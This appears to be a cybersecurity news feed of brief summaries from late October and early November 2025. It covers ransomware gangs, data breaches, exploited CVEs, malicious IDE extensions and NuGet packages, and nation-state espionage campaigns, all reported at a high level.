A malicious Visual Studio (VS) Code extension named "susvsex" was discovered on the official VS Code Extension Marketplace. The extension, which appears to have been created with AI assistance, contained overt ransomware capabilities. Upon activation, it was designed to archive a target directory, exfiltrate the ZIP file to a remote server, and then encrypt the original files. The extension also used a private GitHub repository as a command-and-control channel. Although its default target was a test folder, it could easily be modified to target sensitive user data. Microsoft has since removed the extension, which was published on November 5, 2025.

Nov 8, 20255 min read

Data of Nearly 200,000 Supporters of Hungarian Party TISZA Leaked Online

The personal data of nearly 200,000 supporters of the Hungarian political party TISZA has been leaked and is being widely distributed online. The breach, which occurred in October 2025, originated from the party's "TISZA Világ" service. The compromised dataset, containing 198,500 records, has been added to the Have I Been Pwned service. Exposed information includes supporters' full names, email addresses, phone numbers, physical addresses, and usernames. This incident places affected individuals at significant risk of phishing, fraud, and other malicious targeting.

Nov 8, 20254 min read

Bahrain Fosters Digital Talent with AI and Cybersecurity Partnership

Bahrain is strengthening its national digital capabilities through a new partnership between Beyon Cyber, a cybersecurity firm, and Bahrain Polytechnic. The two organizations signed a Memorandum of Understanding (MoU) to foster innovation in Artificial Intelligence and cybersecurity. The collaboration aims to develop advanced, AI-driven security solutions and cultivate a skilled local workforce. This strategic initiative is aligned with Bahrain's goal of becoming a regional leader in technology and equipping its next generation of professionals with the skills to tackle modern cybersecurity challenges.

Nov 8, 20253 min read

Qilin Ransomware Strikes Again, Claiming Victims Across US, France, and Africa

The Qilin ransomware-as-a-service (RaaS) group has had a highly active month, listing numerous new victims on its data leak site. The group has claimed responsibility for attacks against a wide range of organizations in the U.S., France, and Africa. Victims include insurance providers, healthcare authorities, real estate firms, and French municipalities. This follows recent high-profile claims against two Texas electric cooperatives and Volkswagen Group Finance, demonstrating the group's broad targeting and operational capability, supported by resilient bulletproof hosting infrastructure.

Nov 8, 20255 min read

Cl0p Gang Exploits Oracle EBS Zero-Day in Massive Data Theft Spree

The Cl0p ransomware syndicate, also known as Graceful Spider, is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS). The flaw, which has a CVSS score of 9.8, allows for unauthenticated remote code execution and has been used to steal data from numerous organizations since at least August 2025. The attackers exfiltrated data for weeks before sending extortion demands in late September. In response, Oracle released an emergency patch on October 4, 2025, and CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating a patch deadline for federal agencies.

Nov 7, 20255 min read

SonicWall Breach Far Worse Than Feared: All Cloud Backup Users' Firewall Configs Stolen

**[SonicWall](https://www.sonicwall.com)** has issued a major update on a September data breach, revealing its impact is far more severe than initially disclosed. The company confirmed that an unauthorized party accessed and exfiltrated firewall configuration backups for **all** customers of its MySonicWall cloud backup service, a stark revision from the initial estimate of less than 5%. The stolen `.EXP` files contain complete firewall configurations, including security rules and encrypted credentials. While the credentials remain encrypted, security experts warn that possession of these files significantly lowers the bar for future targeted attacks. SonicWall, assisted by **[Mandiant](https://www.mandiant.com/)**, is urging all affected customers to reset passwords and follow detailed mitigation guidance.

Nov 7, 20255 min read

AI-Powered Social Engineering to Become Top Cyber Threat, ISACA Warns

A new report from the global IT association ISACA reveals a major shift in the threat landscape, with IT professionals now believing AI-driven social engineering will be the most significant cyber threat by 2026. The survey of 3,000 professionals found that 63% ranked this emerging threat highest, surpassing ransomware. Critically, the report also highlights a widespread lack of preparedness, with only 13% of organizations feeling 'very prepared' to manage the risks of generative AI, signaling an urgent need for new defense strategies and training.

Nov 7, 20256 min read

Massive 'I Paid Twice' Phishing Scheme Defrauds Booking.com Hotels and Guests

A sophisticated global phishing campaign named 'I Paid Twice' is targeting hotels on Booking.com and Expedia, compromising their administrative accounts to defraud guests. Since at least April 2025, attackers have been using social engineering and the PureRAT malware to gain access to hotel systems. Once in, they impersonate hotel staff to send fraudulent payment requests to travelers with upcoming reservations, tricking them into paying a second time via a malicious portal. Security firm Sekoia.io, which discovered the operation, reports that the campaign is highly active and has resulted in financial losses for an unknown number of victims.

Nov 7, 20255 min read

Samsung Zero-Day Exploited in the Wild to Install 'LANDFALL' Android Spyware

A now-patched zero-day vulnerability, CVE-2025-21042, in Samsung Galaxy devices was actively exploited to install a commercial-grade Android spyware known as LANDFALL. Researchers from Palo Alto Networks' Unit 42 discovered that attackers sent malicious DNG image files via WhatsApp to targets in the Middle East. The flaw, an out-of-bounds write in an image processing library, allowed for remote code execution. This incident highlights the growing trend of exploiting mobile image parsing libraries to deliver spyware, echoing similar attacks against Apple devices.

Nov 7, 20255 min read

State-Backed Hacking Escalates: Russia Targets Ukraine, China Eyes Latin America

A new report from ESET reveals a significant escalation in cyber operations by state-sponsored threat groups from Russia and China between April and September 2025. Russia-aligned groups, notably Sandworm, have accelerated destructive wiper malware attacks against Ukraine's critical infrastructure, including energy and logistics. Simultaneously, China-aligned actors like FamousSparrow have increased espionage activities targeting governmental entities in Latin America, potentially in response to shifting geopolitical dynamics. The report highlights a global landscape of heightened cyber conflict driven by national interests.

Nov 7, 20256 min read

Patient Sabotage: Malicious NuGet Packages with Time-Delayed ICS Payloads Discovered

Security researchers have discovered nine malicious packages on the NuGet repository, downloaded over 9,400 times, containing hidden, time-delayed sabotage code. One package, 'Sharp7Extend,' was specifically designed to corrupt write operations in industrial control systems (ICS) by silently causing them to fail after a grace period. This could lead to physical damage or production failures. The code was set to trigger on specific dates, some as far in the future as 2028, demonstrating a patient and highly destructive approach to supply chain attacks.

Nov 7, 20256 min read

Software Supply Chain Attacks Skyrocket to Record High, Driven by Ransomware Gangs

Software supply chain attacks reached an all-time high in October 2025, with 41 claimed incidents, according to a new report from Cyble. This figure is over 30% higher than the previous monthly record. Ransomware groups, particularly Qilin and Akira, are identified as the primary drivers of this trend, responsible for a majority of attacks in 2025. The information technology, finance, and energy sectors are the most heavily targeted, highlighting a strategic shift by attackers to compromise organizations through their trusted third-party suppliers.

Nov 7, 20255 min read

Amazon Patches High-Severity Flaw in WorkSpaces Linux Client

Amazon Web Services (AWS) has patched a high-severity vulnerability, CVE-2025-12779, in its WorkSpaces client for Linux. The flaw, rated 8.8 CVSS, could allow a local attacker on a shared computer to extract another user's authentication token and gain unauthorized access to their virtual desktop session. The issue affects Linux client versions 2023.0 through 2024.8. AWS has released a patched version and recommends all users upgrade immediately to mitigate the risk.

Nov 7, 20254 min read

CISA Adds Actively Exploited Control Web Panel RCE Flaw to KEV

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical command injection vulnerability in Control Web Panel (CWP), CVE-2025-48703, to its Known Exploited Vulnerabilities (KEV) catalog. The action confirms the flaw is being actively exploited in the wild. The vulnerability allows a remote, unauthenticated attacker to achieve remote code execution (RCE) on servers running the popular Linux web hosting panel. CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by November 25, 2025, and strongly urges all other organizations to remediate it immediately.

Nov 6, 20255 min read

U.S. Congressional Budget Office Breached by Suspected Foreign Actor

The U.S. Congressional Budget Office (CBO), the nonpartisan agency that provides economic analysis to Congress, confirmed on November 6, 2025, that it suffered a significant cybersecurity breach. The attack is suspected to be the work of a foreign government, raising concerns about espionage and the potential exposure of sensitive, pre-decisional information. Data at risk includes confidential communications between lawmakers and CBO analysts, as well as early drafts of legislative cost analyses. The CBO has taken steps to contain the incident and is investigating the full scope of the compromise.

Nov 6, 20256 min read

Cisco Warns of New DoS Attacks Actively Exploiting Firewall Flaws

Cisco has issued an urgent warning about a new attack variant actively targeting its Secure Firewall products. Threat actors are chaining two previously disclosed vulnerabilities, CVE-2025-20333 and CVE-2025-20362, to cause a denial-of-service (DoS) condition on unpatched Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) devices. These same flaws were exploited as zero-days in September 2025 and are listed in CISA's KEV catalog. Cisco strongly recommends that all customers immediately upgrade to patched software versions to prevent network outages and potential device compromise.

Nov 6, 20255 min read

Critical SQL Injection Flaw in Django Framework Puts Web Apps at Risk

The Django project has released urgent security updates to patch a critical SQL injection vulnerability, CVE-2025-64459, rated 9.1 on the CVSS scale. The flaw affects Django versions 4.2, 5.1, 5.2, and the 6.0 beta. It allows an attacker to manipulate database queries by passing a specially crafted dictionary to certain ORM methods, potentially leading to unauthorized data access, modification, or authentication bypass. Due to the widespread use of Django and the low complexity of the attack, developers are strongly urged to upgrade to the patched versions (4.2.26, 5.1.14, 5.2.8) immediately.

Nov 6, 20255 min read

Washington Post Confirms Breach in Cl0p's Oracle Supply Chain Attack

The Washington Post confirmed on November 6, 2025, that it was a victim of the widespread supply chain attack orchestrated by the Cl0p ransomware gang. The attack exploited a zero-day vulnerability in Oracle's E-Business Suite (EBS), a widely used enterprise software platform. This confirmation came after Cl0p added the newspaper to its dark web leak site, a classic extortion tactic. The incident highlights the significant risk of supply chain attacks, where a single vulnerability in a trusted third-party vendor's software can lead to the compromise of hundreds of high-profile organizations.

Nov 6, 20256 min read

Zscaler: 239 Malicious Apps on Google Play Downloaded 42 Million Times

A new report from Zscaler's ThreatLabz, published November 5, 2025, reveals a dramatic 67% year-over-year increase in Android malware. Researchers identified 239 malicious applications that successfully bypassed Google Play Store security, amassing a collective 42 million downloads before being removed. These apps often masqueraded as legitimate productivity 'Tools' to trick users. The report also highlights a dangerous trend in attacks against critical infrastructure, with the energy sector seeing a 387% surge in IoT/OT attacks, and significant increases in transportation and healthcare as well.

Nov 6, 20256 min read

Hackers Hijack Logistics Systems to Orchestrate Physical Cargo Heists

A new and growing form of hybrid crime is targeting the supply chain, where cybercriminals infiltrate freight and logistics companies to facilitate physical cargo theft. According to recent reports, threat actors compromise carrier systems, often using legitimate Remote Monitoring and Management (RMM) tools like ScreenConnect. Once inside, they manipulate digital 'load boards' to bid on and win real shipments. They then reroute the cargo to a location controlled by organized crime partners, leading to the theft of entire truckloads of goods. This trend highlights a critical vulnerability where the digital transformation of the logistics industry is being exploited to cause billions in real-world losses.

Nov 6, 20256 min read

CISA Adds Actively Exploited Gladinet and CWP Flaws to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming they are under active attack. The flaws include an information disclosure bug in Gladinet CentreStack/Triofox (CVE-2025-11371) and an OS command injection vulnerability in CWP Control Web Panel (CVE-2025-48703). Under Binding Operational Directive (BOD) 22-01, federal agencies are mandated to patch these vulnerabilities by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to defend against these active threats.

Nov 5, 20254 min read

CISA Warns of Critical ICS Flaws in Fuji, Delta, and Radiometrics Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released five advisories detailing critical vulnerabilities in Industrial Control Systems (ICS) from Fuji Electric, Survision, Delta Electronics, Radiometrics, and IDIS. The flaws, which include buffer overflows and authentication bypasses with CVSS scores up to 10.0, could allow remote code execution and severe disruption of critical infrastructure in sectors like manufacturing, energy, and aviation. CISA is urging immediate review and mitigation, as successful exploitation could lead to loss of control over industrial processes and, in some cases, create hazardous physical conditions.

Nov 5, 20255 min read

Swedish IT Firm Breach Exposes Data of 1.5 Million, Sparks GDPR Probe

The Swedish IT services firm Miljödata has suffered a severe data breach, exposing the personal and potentially sensitive information of over 1.5 million people. The incident, which occurred in late August, resulted in the stolen data being published on the darknet. In response, the Swedish Data Protection Authority (IMY) has launched a major investigation under the General Data Protection Regulation (GDPR), targeting both Miljödata and several of its public sector clients, including the City of Gothenburg and Region Västmanland.

Nov 5, 20254 min read

Identity is the New Perimeter: Stolen Credentials and Over-Privileged Accounts Drive Cloud Breaches

A consensus is forming across the cybersecurity industry: identity is the new security perimeter in the cloud. New reports from ReliaQuest and Amazon Web Services (AWS) reveal that identity-based attacks are the leading driver of cloud security incidents. Key findings show that compromised credentials caused 20% of breaches, while a staggering 99% of cloud identities are 'over-privileged,' possessing excessive permissions. Experts are urging a strategic shift away from network-centric security and towards a 'zero standing privileges' model, where access is granted on a temporary, as-needed basis to mitigate this massive attack surface.

Nov 5, 20253 min read

Hackers Claim Breach and Full Database Theft from Russian Nuclear Waste Facility 'Radon'

A threat actor has posted on a data leak forum claiming to have breached Radon, a Russian state-owned enterprise responsible for nuclear waste management and operated by the nuclear giant Rosatom. The attackers allege they have stolen the company's entire database, which reportedly includes sensitive test statistics, user IDs, and the personal information of employees. Security experts warn that if the claim is legitimate, the breach poses a severe risk, as the data could be used to forge safety documents, endanger physical safety, or launch sophisticated spear-phishing campaigns against Russia's critical nuclear infrastructure.

Nov 5, 20254 min read

F5 Hacked by Nation-State Actor; BIG-IP Source Code Stolen

F5 Networks has disclosed a severe security incident involving a 'highly sophisticated nation-state threat actor' that gained long-term access to its development environment. The attackers, suspected to be the Chinese espionage group UNC5221, successfully stole source code for F5's flagship BIG-IP products. While F5 found no evidence of a software supply chain compromise, the theft of these 'digital blueprints' creates a significant risk of future zero-day vulnerabilities. The Australian Cyber Security Centre (ACSC) has issued an urgent advisory, and F5 released a large batch of 44 new vulnerability patches concurrently with the disclosure.

Nov 4, 20255 min read

Millions of Devs at Risk: Critical RCE Flaw in Popular React Native Package

A critical remote code execution (RCE) vulnerability, CVE-2025-11953, has been discovered in a popular React Native command-line tool, putting millions of developers at risk. The flaw, rated 9.8 on the CVSS scale, exists in the '@react-native-community/cli' NPM package and allows an unauthenticated attacker to execute arbitrary code on a developer's machine by sending a malicious request to the Metro development server. This could lead to source code theft, malware injection, or a full-blown supply chain attack. Meta has released a patch, and developers are strongly urged to update their dependencies.

Nov 4, 20253 min read

Conti's Ghost: New 'DragonForce' Ransomware Adopts Cartel Model

A new ransomware operation named DragonForce has been identified by security researchers, notable for its use of leaked source code from the infamous Conti ransomware. Instead of a traditional Ransomware-as-a-Service (RaaS) model, DragonForce operates with a 'cartel-like' structure, providing affiliates with a builder to create their own branded ransomware variants. This approach facilitates the rapid proliferation of new threats, with groups like 'Devman' already seen deploying malware created with the DragonForce builder. The core malware retains Conti's technical features, including its encryption scheme and ability to spread via SMB.

Nov 4, 20254 min read

EU Stress-Tests Cyber Defenses in Large-Scale Crisis Simulation

The European Union has concluded its 2025 'Blueprint Operational Level Exercise' (BlueOLEx), a large-scale simulation designed to test and improve the bloc's collective response to major cybersecurity crises. Hosted in Cyprus with support from the EU's cybersecurity agency, ENISA, the exercise brought together senior officials from all member states to role-play a significant cyber incident affecting critical sectors. The drill was the first to test the new EU Cyber Blueprint, which aims to clarify roles and streamline coordination between national authorities and the European Commission during a cross-border attack.

Nov 4, 20253 min read

Philippine Police Brace for Coordinated DDoS Attacks on Government Websites

The Philippine National Police (PNP) has mobilized its cybersecurity units and placed them on high alert in anticipation of a potential large-scale distributed denial-of-service (DDoS) campaign targeting government websites. According to intelligence, the attacks are slated to begin on November 5, 2025. The PNP is coordinating with the Department of Information and Communications Technology (DICT) and other national agencies to harden critical digital infrastructure and prepare rapid response teams to mitigate any disruption to public services.

Nov 4, 20254 min read

US Cyber Threat Sharing Law 'CISA 2015' Expires, Creating Potential Intelligence Gap

The Cybersecurity Information Sharing Act of 2015 (CISA 2015), a foundational U.S. law that provided liability protections to encourage private companies to share cyber threat data with the government, expired on October 1, 2025. Amidst a government shutdown and a block by Senator Rand Paul, lawmakers failed to reauthorize the act. Security and legal experts warn this could have a chilling effect on threat intelligence sharing, with one law firm predicting a potential 80% drop. The lapse creates uncertainty and could hinder national cybersecurity efforts. In response, new legislation, the PACT Act, has been introduced to retroactively restore and extend the protections, but its future is uncertain.

Nov 3, 20255 min read

Insider Threat Shocker: Cybersecurity Pros Indicted for Wielding ALPHV/BlackCat Ransomware

In a severe breach of trust, two cybersecurity professionals, Ryan Clifford Goldberg and Kevin Tyler Martin, have been indicted for allegedly conducting ALPHV/BlackCat ransomware attacks against at least five U.S. companies. The individuals, who held roles in incident response and ransomware negotiation, are accused of conspiring to extort nearly $1.3 million from a Florida medical company. This case highlights a critical insider threat risk within the cybersecurity industry itself, where trusted professionals abuse their knowledge and access for criminal gain.

Nov 3, 20254 min read

SK Telecom Profit Plummets 90% Following Massive Data Breach Affecting 27 Million Customers

South Korean telecom giant SK Telecom has reported a catastrophic 90% drop in its Q3 operating profit, directly attributing the loss to the massive costs of a data breach that exposed the personal data of 27 million customers. The breach, which went undetected for nearly three years, involved 25 different malware types and led to a record $96.5 million (134 billion won) fine from regulators. This incident serves as a stark illustration of the severe and tangible financial consequences of long-term cybersecurity failures and inadequate threat detection.

Nov 3, 20254 min read

China Amends Cybersecurity Law, Massively Increasing Fines and Adding AI Governance Clause

China has passed major amendments to its 2016 Cybersecurity Law, set to take effect on January 1, 2026. The changes dramatically increase financial penalties for non-compliance, raising the maximum fine for Critical Information Infrastructure Operators (CIIOs) tenfold to RMB 10 million (approx. $1.41M) and for non-CIIOs to RMB 2 million. The amendments also introduce a new, general clause on Artificial Intelligence governance, signaling tighter regulatory control over technology and data security within the country.

Nov 3, 20254 min read

Microsoft Discovers 'SesameOp' Backdoor Using OpenAI API for Covert C2

Microsoft's Detection and Response Team (DART) has discovered a novel backdoor named 'SesameOp' that uniquely uses the OpenAI Assistants API for its command-and-control (C2) communications. Found during an espionage investigation, the malware hides its malicious traffic within legitimate API calls to the OpenAI platform, making it extremely difficult to detect. The attackers also used .NET AppDomainManager injection by compromising Microsoft Visual Studio utilities to achieve persistence.

Nov 3, 20255 min read

Europe Now #2 Global Ransomware Target, Attacks Accelerating to 24-Hour Deployments

Europe is now the second-largest global target for ransomware, accounting for 22% of all victims, according to CrowdStrike's 2025 European Threat Landscape Report. The report highlights a dramatic increase in attack speed, with groups like SCATTERED SPIDER now able to deploy ransomware in just 24 hours from initial access. The threat is fueled by a thriving initial access broker (IAB) market and escalating geopolitical tensions involving Russian, Chinese, and North Korean state-sponsored actors targeting critical sectors.

Nov 3, 20255 min read

Cl0p Ransomware Exploits Oracle EBS Zero-Day in Active Attacks

The notorious Cl0p ransomware gang is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS) to gain initial access to corporate networks. The complex flaw, which allows for remote code execution, has already been linked to at least two major security incidents, including a breach at Harvard University. With mass exploitation now being reported, organizations using Oracle EBS are at immediate and significant risk and are urged to apply mitigations immediately.

Nov 3, 20258 min read

Everest Ransomware Hits Swedish Power Grid Operator, Steals 280GB of Data

Sweden's national electricity operator, Svenska kraftnät, has confirmed a data breach following a claim by the Everest ransomware group. The attackers alleged on their dark web leak site that they had stolen 280 GB of internal data. Svenska kraftnät stated that the attack was confined to an external file transfer system and that the nation's core power grid operations and electricity supply were not affected. An investigation is underway to determine the scope of the compromised data.

Nov 2, 20255 min read

Penn Data Breach: Hacker Claims 1.2M Donor Records Stolen, Exposes "Terrible Security"

A threat actor has claimed responsibility for a massive data breach at the University of Pennsylvania, asserting they have stolen the personal and financial data of 1.2 million donors and alumni. The breach was first revealed after offensive emails were sent from a university system hosted on Salesforce Marketing Cloud. The attacker claims to have gained initial access via a compromised employee single sign-on (SSO) account, which provided a gateway to sensitive platforms including Salesforce, Qlik, SAP, and SharePoint. Data samples, including highly sensitive demographic and financial information, were shared to substantiate the claims, highlighting severe security lapses at the institution.

Nov 2, 20256 min read

Polish Government Confirms "Very Serious" Data Breach at SuperGrosz Loan Platform

Polish authorities, led by the Deputy Prime Minister, have confirmed a "very serious" data breach at the online loan platform SuperGrosz. The attack resulted in the theft of a vast repository of sensitive customer information, including full names, national identification (PESEL) numbers, ID card details, bank account numbers, and detailed employment information. Poland's national cybersecurity teams have launched a full investigation, and the government has issued a public warning urging affected customers to take immediate security measures to prevent identity theft, such as blocking their PESEL numbers.

Nov 2, 20255 min read

Google Patches Critical Zero-Click RCE Flaw in Android; Millions of Devices at Risk

Google's November 2025 Android Security Bulletin includes a patch for a critical zero-click remote code execution (RCE) vulnerability, tracked as CVE-2025-48593. The flaw, residing in the Android System component, affects Android versions 13, 14, 15, and 16, and allows remote attackers to compromise a device without any user interaction. Due to its severity and zero-click nature, the vulnerability poses a severe risk to users. The update also addresses a high-severity privilege escalation flaw, CVE-2025-48581. Users are urged to install the update as soon as it becomes available.

Nov 2, 20254 min read

"SleepyDuck" RAT Emerges in Open VSX Marketplace via Malicious Update

A new remote access trojan (RAT) named "SleepyDuck" has been discovered in the Open VSX marketplace, a popular repository for IDE extensions. A seemingly benign developer extension, 'juan-bianco.solidity-vlang', was updated on November 1, 2025, to include the malware after it had already been downloaded thousands of times. SleepyDuck activates when a user opens a new editor window or a Solidity file. In a sophisticated twist, the malware uses an Ethereum smart contract for a resilient and dynamic command-and-control (C2) infrastructure, allowing it to fetch updated C2 server addresses from the blockchain.

Nov 2, 20255 min read

Samsung's November Security Update Patches 45 Vulnerabilities, Including Critical Android Flaws

Samsung has released its November 2025 security maintenance release, delivering patches for 45 vulnerabilities affecting its Galaxy smartphones and tablets. The update incorporates Google's latest Android patches, including a fix for the critical zero-click RCE vulnerability CVE-2025-48593. Additionally, the release addresses 9 Samsung-specific vulnerabilities (SVEs), including high-severity flaws in the fingerprint trustlet and image codec library, as well as 11 security issues in its Exynos chipsets. Users are advised to install the update promptly.

Nov 2, 20254 min read

openSUSE Patches Moderate-Severity Flaws in X.Org Server

The openSUSE project released a security advisory on November 1, 2025, to address three moderate-severity vulnerabilities in the xorg-x11-server package for its Tumbleweed distribution. The flaws could lead to out-of-bounds memory access, potentially resulting in denial-of-service via server crashes or, in some cases, privilege escalation. Users of openSUSE Tumbleweed are advised to apply the update to mitigate the risks.

Nov 2, 20253 min read

T-Mobile Enters Credit Card Market with Capital One, Raising Data Security Questions

T-Mobile announced its entry into the financial services sector with the launch of its first-ever credit card, created in partnership with banking giant Capital One. This strategic move will leverage T-Mobile's vast customer base and Capital One's financial infrastructure. The partnership introduces significant cybersecurity and data privacy considerations, as it creates a new, complex data environment merging telecommunications and financial information. Both companies have histories of data breaches, making robust security and compliance with regulations like PCI DSS critical for the new venture's success.

Nov 2, 20254 min read

CISA Adds Actively Exploited Motex LANSCOPE RCE Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Motex's LANSCOPE Endpoint Manager, CVE-2025-61932, to its Known Exploited Vulnerabilities (KEV) catalog following confirmation of active attacks. The flaw, rated 9.3 CVSS, allows for unauthenticated remote code execution on affected endpoints. Attackers have reportedly been weaponizing the vulnerability to install backdoors on victim systems, primarily observed in Japan. Federal agencies are now mandated to patch by November 12, 2025.

Nov 1, 20254 min read

China-Backed Group Exploits Unpatched Windows Flaw to Spy on EU Diplomats

A China-linked cyber-espionage group, UNC6384, associated with Mustang Panda, is actively exploiting an unpatched Windows UI misrepresentation vulnerability, CVE-2025-9491, to conduct espionage against European diplomatic entities. The campaign, active since September 2025, uses sophisticated phishing emails containing malicious LNK files themed around EU and NATO events. These files trigger a multi-stage attack that deploys the PlugX RAT via DLL side-loading. Despite being reported in 2024 and publicly disclosed in March 2025, Microsoft has decided not to issue a security patch, stating the flaw does not meet its bar for servicing.

Nov 1, 20255 min read

Akira Ransomware Claims Breach of Apache OpenOffice, Threatens Data Leak

The prolific Akira ransomware group has listed Apache OpenOffice, a popular open-source office suite, as a victim on its dark web data leak site. The threat actors claim to have exfiltrated 23 gigabytes of data from the Apache Software Foundation, including financial records, internal documents, and employee personally identifiable information (PII). As of November 1, 2025, the alleged breach has not been confirmed by the Apache Software Foundation, leaving the scope and authenticity of the claim unverified.

Nov 1, 20254 min read

Ukrainian Conti Ransomware Affiliate Extradited to US

Oleksii Lytvynenko, a 43-year-old Ukrainian national, has been extradited from Ireland to the United States for his alleged role in the notorious Conti ransomware syndicate. He pleaded not guilty in a Tennessee federal court to charges of conspiracy to commit computer fraud and extortion. Lytvynenko is accused of participating in attacks by the Conti group, which extorted over $150 million from more than 1,000 victims worldwide. If convicted, he faces a potential prison sentence of up to 25 years.

Nov 1, 20254 min read

New 'KYBER' Ransomware Emerges with Advanced Encryption and Data-Driven Extortion Model

Cybersecurity researchers at CYFIRMA have identified a new ransomware strain named KYBER, which employs a sophisticated hybrid encryption scheme including the post-quantum Kyber1024 algorithm. The ransomware, discovered on underground forums, follows a double-extortion model, threatening to leak stolen data if victims do not establish contact within two weeks. KYBER targets Windows systems in English-speaking countries, with a focus on high-value sectors like Aerospace & Defense and technology. Researchers warn it may evolve into a full-fledged Ransomware-as-a-Service (RaaS) operation.

Nov 1, 20254 min read

Australia Warns of 'BADCANDY' Malware Targeting Unpatched Cisco Devices

The Australian Signals Directorate (ASD) has issued an urgent warning about an ongoing cyberattack campaign deploying a new malware implant called 'BADCANDY' on unpatched Cisco IOS XE devices. The attackers are exploiting the critical remote code execution vulnerability CVE-2023-20198 (CVSS 10.0) to gain full control of routers and switches. The ASD reports a recent spike in activity, with 150 Australian devices infected in October 2025 alone. The malware, a non-persistent web shell, is being actively redeployed by attackers even after removal.

Nov 1, 20254 min read

New "Airstalk" Malware Abuses VMware API in Nation-State Supply Chain Attack

A newly identified malware strain, "Airstalk," has been deployed in a sophisticated supply chain attack believed to be sponsored by a nation-state actor. The activity, tracked as the cluster CL-STA-1009, is notable for its novel command-and-control (C2) technique: it misuses the API of VMware's Workspace ONE Unified Endpoint Management (UEM), formerly AirWatch, to communicate covertly. The malware is also signed with a likely stolen digital certificate to evade detection, pointing to a well-resourced and stealthy adversary.

Nov 1, 20255 min read

Data Breaches Hit Toys 'R' Us Canada, Askul, and Verisure

A wave of data breaches has impacted several consumer-facing companies globally. Toys "R" Us Canada has had customer records leaked on the dark web. Japanese retailer Askul suffered a disruptive ransomware attack that halted operations and may have resulted in a data leak. Additionally, Swedish security firm Verisure disclosed a breach affecting 35,000 customers via a third-party vendor, and U.S.-based Jewett-Cameron Trading reported the theft of financial documents.

Oct 31, 20254 min read

CISA KEV Alert: XWiki RCE Flaw Actively Exploited for Cryptomining

The US Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in the XWiki enterprise wiki platform, CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, rated 9.8 on the CVSS scale, allows an unauthenticated attacker to execute arbitrary code by injecting malicious Groovy expressions into a search query. Security researchers at VulnCheck have confirmed active exploitation in the wild, with attackers using the vulnerability to deploy cryptocurrency mining malware. CISA has mandated that federal agencies patch the flaw promptly due to the immediate risk.

Oct 31, 20254 min read

VMware Zero-Day LPE Flaw Exploited by China-Linked Actor Added to CISA KEV

CISA has added CVE-2025-41244, a high-severity local privilege escalation (LPE) vulnerability in VMware products, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw affects VMware Aria Operations and VMware Tools and allows a non-administrative user on a virtual machine to gain root privileges. The vulnerability has been exploited as a zero-day since mid-October 2024, with attribution pointing to UNC5174, a suspected China-linked threat actor. The flaw is an untrusted search path vulnerability, and a public proof-of-concept is available, increasing the risk to unpatched systems.

Oct 31, 20254 min read

Finance Execs Targeted in Sophisticated LinkedIn Phishing Scheme with Fake Board Invites

A sophisticated phishing campaign is targeting finance executives through LinkedIn direct messages, using fake invitations to an executive board as a lure. The multi-stage attack, detailed by Push Security, aims to harvest Microsoft credentials and session cookies to bypass MFA. The attack chain leverages trusted services to appear legitimate, starting with a Google open redirect, leading to a fraudulent portal hosted on Google Firebase, and using a Cloudflare CAPTCHA to evade security bots. This non-email-based phishing vector is reportedly becoming significantly more common, accounting for over a third of recent attempts tracked by researchers.

Oct 31, 20255 min read

Telecom Giant Ribbon Communications Breached by Nation-State Actor for 10 Months

Telecommunications provider Ribbon Communications has disclosed a significant security breach by a suspected nation-state actor. According to an SEC filing, the attackers first gained access in December 2024 and remained undetected for nearly a year until September 2025. The company, which serves critical clients including the U.S. Department of Defense and major carriers like Verizon, stated the actor accessed several customer files stored on two laptops outside the main network. The long dwell time and the nature of the target suggest a sophisticated espionage campaign, raising serious concerns about supply chain security in the telecommunications sector.

Oct 31, 20255 min read

Canada Issues National Alert as Hacktivists Target Critical Infrastructure

The Canadian Centre for Cyber Security, along with the RCMP, has issued a national alert warning of increasing cyberattacks by hacktivists against the nation's critical infrastructure. The advisory follows multiple successful breaches of internet-accessible Industrial Control Systems (ICS) in sectors like water treatment, food, and manufacturing. The alert notes a tactical shift by hacktivists from simple DDoS attacks to more disruptive intrusions into Operational Technology (OT). Authorities are urging organizations, especially in under-regulated sectors, to immediately inventory and secure exposed ICS/OT devices, recommending VPNs with 2FA and enhanced monitoring to mitigate the risk to public safety.

Oct 31, 20254 min read

Conduent Data Breach: 10 Million+ Individuals' Personal & Medical Data Exposed

Conduent Business Services, a major contractor for U.S. government agencies, has disclosed a massive data breach impacting over 10 million individuals. The incident, which occurred between October 2024 and January 2025, involved an unauthorized third party gaining access to Conduent's network and exfiltrating files. The compromised data is highly sensitive, including names, Social Security numbers, medical information, and health insurance details. The breach has affected residents across numerous states, including Texas, Washington, and California, and has triggered a legal investigation by the law firm Edelson Lechtzin LLP into the company's data privacy practices.

Oct 31, 20254 min read

Qilin Ransomware Claims 700 Victims in 2025, Becoming Top Global Threat

The Qilin ransomware group has dramatically escalated its activities in 2025, claiming over 700 attacks to become the year's most prolific ransomware operation. Operating a Ransomware-as-a-Service (RaaS) model, the Russia-based group has far surpassed the activity of 2024's leader, RansomHub. A significant surge in Qilin's attacks followed the shutdown of the RansomHub operation in April 2025, suggesting a migration of affiliates. Qilin aggressively targets critical infrastructure sectors worldwide, including healthcare, finance, and government, using double-extortion tactics.

Oct 30, 20255 min read

Ad Giant Dentsu's Subsidiary Merkle Hit by Cyberattack, Staff and Client Data Exposed

Global advertising firm Dentsu has confirmed that its US-based customer experience management (CXM) subsidiary, Merkle, was the target of a cyberattack. The company detected 'abnormal activity' on Merkle's network and proactively shut down certain systems to contain the threat. An investigation has confirmed that the incident led to the exposure of both staff and sensitive client data. Merkle, a major player in the CXM industry, handles large volumes of customer data, making it a high-value target for threat actors. The full scope of the breach is still under investigation.

Oct 30, 20254 min read

